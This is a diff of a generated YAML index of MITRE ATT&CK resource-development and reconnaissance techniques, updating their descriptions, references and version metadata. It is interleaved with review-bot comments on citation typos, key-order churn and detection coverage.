+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ - source_name: FireEyeSupplyChain
+ description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+ SunshopFireEye. Retrieved March 6, 2017.'
+ url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1650:
technique:
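Review bot: the re-added `FireEyeSupplyChain` reference for T1588 still reads "SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye", with the publisher name fused onto the title, exactly as in the removed line above it. That is upstream ATT&CK data carried through verbatim, so nothing to change in this file, but it is worth an upstream report rather than letting it ride through every regeneration. The rest of the hunk is the same delete-and-reinsert reordering already flagged on T1588.002; the only real edits are the `modified` bump, the spec version move to 3.2.0 with `revoked: false` and `x_mitre_deprecated: false`, and the Recorded Future URL changing to `https://www.recordedfuture.com/research/cobalt-strike-servers`.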
@@ -54630,37 +55289,38 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.007:
technique:
- modified: '2022-10-20T21:19:57.555Z'
+ modified: '2024-10-03T14:18:34.045Z'
name: Serverless
description: "Adversaries may compromise serverless cloud infrastructure, such
- as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
- By utilizing serverless infrastructure, adversaries can make it more difficult
- to attribute infrastructure used during operations back to them. \n\nOnce
- compromised, the serverless runtime environment can be leveraged to either
- respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+ as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+ can be used during targeting. By utilizing serverless infrastructure, adversaries
+ can make it more difficult to attribute infrastructure used during operations
+ back to them. \n\nOnce compromised, the serverless runtime environment can
+ be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
traffic to an adversary-owned command and control server.(Citation: BlackWater
- Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
- by these functions will appear to come from subdomains of common cloud providers,
- it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+ Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+ Apps Script Abuse 2021) As traffic generated by these functions will appear
+ to come from subdomains of common cloud providers, it may be difficult to
+ distinguish from ordinary traffic to these providers - making it easier to
+ [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
Workers)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -54684,11 +55344,14 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.004:
technique:
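Review bot: the new `GWS Apps Script Abuse 2021` reference URL ends in `#google_vignette`, the fragment Google AdSense interstitial ("vignette") ads append to a page address when it is opened through an ad overlay; it is not part of the BleepingComputer article's address. It does no harm when fetched, but it is noise in a citation and will be copied into every downstream consumer of this index. Since this file mirrors the upstream ATT&CK reference verbatim, trim it upstream rather than patching it here, and consider a generator-side check for stray URL fragments.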
@@ -54746,17 +55409,18 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.006:
technique:
- modified: '2023-03-13T20:35:52.302Z'
+ modified: '2024-08-14T15:03:56.383Z'
name: SEO Poisoning
description: |-
Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
+ In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
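Review bot: in the added T1608.006 paragraph, `popularity(Citation: Chexmarx-seo)` is missing the space before the citation, and the key spells the vendor `Chexmarx` while its sibling in the same sentence is `Checkmarx-oss-seo`. The key does match the `source_name: Chexmarx-seo` entry added to `external_references` further down, so the citation still resolves; both are upstream typos rather than something the generator introduced, but flag them upstream so the next regeneration does not keep an inconsistent citation key for the same publisher.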
@@ -54764,7 +55428,7 @@ resource-development:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Vijay Lalwani
- Will Thomas, Equinix Threat Analysis Center (ETAC)
- Will Jolliffe
@@ -54778,7 +55442,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -54811,11 +55475,18 @@ resource-development:
description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
September 30, 2022.
url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+ - source_name: Chexmarx-seo
+ description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+ the Star Ranking Game. Retrieved June 18, 2024.'
+ url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+ - source_name: Checkmarx-oss-seo
+ description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+ Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+ url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.003:
technique:
@@ -54837,7 +55508,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:19:50.018Z'
name: Code Signing Certificates
description: |-
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -54855,47 +55526,10 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
- type: attack-pattern
- created: '2020-10-01T01:30:00.877Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1587
- url: https://attack.mitre.org/techniques/T1587
- - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
- description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
- Units. Retrieved July 18, 2016.
- source_name: Mandiant APT1
- - source_name: Kaspersky Sofacy
- description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
- 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
- December 10, 2015.
- url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
- - source_name: Bitdefender StrongPity June 2020
- url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
- description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
- Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
- - source_name: Talos Promethium June 2020
- url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
- description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
- reach with StrongPity3 APT. Retrieved July 20, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:31:17.270Z'
name: Develop Capabilities
description: |-
Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
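Review bot: almost everything removed from T1587 in this hunk (platforms, domains, id, type, created, external_references) is re-added with the same values in the next hunk in a different key order, so the only substantive change is the `modified` timestamp, buried in roughly forty lines of churn. Consider having the generator emit technique keys in a fixed order (sorted, or upstream order kept stable across runs) so that a real content change shows up as a one-line diff. Also note that the leading context of this hunk removes both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` from the preceding object (T1588.003) without a visible replacement; the same pattern recurs for T1588.005, T1596.003, T1597.002, T1590.005, T1596.002 and T1596.001, so confirm that each of those objects still carries an `x_mitre_attack_spec_version` in the part of the file not shown here.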
@@ -54904,21 +55538,57 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+ created: '2020-10-01T01:30:00.877Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1587
+ external_id: T1587
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Mandiant APT1
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ - source_name: Talos Promethium June 2020
+ description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+ reach with StrongPity3 APT. Retrieved July 20, 2020.
+ url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+ - source_name: Bitdefender StrongPity June 2020
+ description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+ Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+ url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1588.005:
technique:
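Review bot: nothing in this hunk changes the content of T1587: the description, detection text and `x_mitre_version: '1.1'` are unchanged, so the new 2024-10-15 `modified` value is a metadata-only refresh, and the only new fields are the explicit `revoked: false` and `x_mitre_deprecated: false`. The external_references list comes back in a different order than before (Kaspersky Sofacy first, Mandiant APT1 fourth), which is more diff noise, but every Citation token used in the description (Mandiant APT1, Kaspersky Sofacy, Bitdefender StrongPity June 2020, Talos Promethium June 2020) and in the detection text (Splunk Kovar Certificates 2017) still resolves to an entry in the list.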
@@ -54958,7 +55628,7 @@ resource-development:
description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:14:01.255Z'
name: Exploits
description: |-
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -54977,15 +55647,13 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.001:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-24T15:10:40.270Z'
name: Domains
description: |-
- Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+ Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
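Review bot: the description now adds "compromising a cloud service that enables managing domains (e.g., AWS Route53)" as a hijack path, but the detection guidance retained below (monitor for anomalous changes to registrant and resolution information) is unchanged and says nothing about the cloud control plane. For this repository's purposes, any atomic test written against this sub-technique should point defenders at the cloud provider's own change and audit logging for the DNS service's hosted zones, since those events are visible to the victim organization in a way registrar-side changes often are not. The matching `x_mitre_version` bump ('1.3' to '1.4') appears in the following hunk, which is consistent with a description edit.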
@@ -54993,19 +55661,19 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Jeremy Galloway
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.3'
- x_mitre_contributors:
- - Jeremy Galloway
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -55039,55 +55707,64 @@ resource-development:
url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
reconnaissance:
T1592:
technique:
- x_mitre_platforms:
- - PRE
+ modified: '2024-10-03T19:35:07.269Z'
+ name: Gather Victim Host Information
+ description: |-
+ Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ x_mitre_contributors:
+ - Sam Seabrook, Duke Energy
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Internet Scan: Response Content'
type: attack-pattern
+ id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
created: '2020-10-02T16:39:33.966Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1592
url: https://attack.mitre.org/techniques/T1592
+ external_id: T1592
- source_name: ATT ScanBox
- url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ - source_name: TrellixQakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved August 1, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: Gather Victim Host Information
- description: |-
- Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
- Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: reconnaissance
- x_mitre_detection: |-
- Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.1'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1596.003:
technique:
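Review bot: the content change in this hunk is the new third paragraph on User-Agent based targeting, and it is internally consistent: the `(Citation: TrellixQakbot)` token resolves to the entry added in this same hunk, `x_mitre_version` moves '1.1' to '1.2', and a contributor is added. One point worth carrying into any atomic test for this addition: `x_mitre_data_sources` stays at 'Internet Scan: Response Content' only, which covers scanning adversary sites for collection scripts but not the server-side User-Agent gating the new paragraph describes. From the victim side that gating is observable only indirectly (the same URL returning different content to different user agents), so a test should state what artifact it expects a defender to see. The `url:` lines for ATT ScanBox and ThreatConnect have merely moved below their `description:` lines; no value changed.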
@@ -55112,7 +55789,7 @@ reconnaissance:
url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
from Server (Site URL). Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:48:37.628Z'
name: Digital Certificates
description: |-
Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -55128,8 +55805,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.002:
technique:
@@ -55151,7 +55826,7 @@ reconnaissance:
url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:44:43.900Z'
name: Purchase Technical Data
description: |-
Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -55167,8 +55842,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.005:
technique:
@@ -55196,7 +55869,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
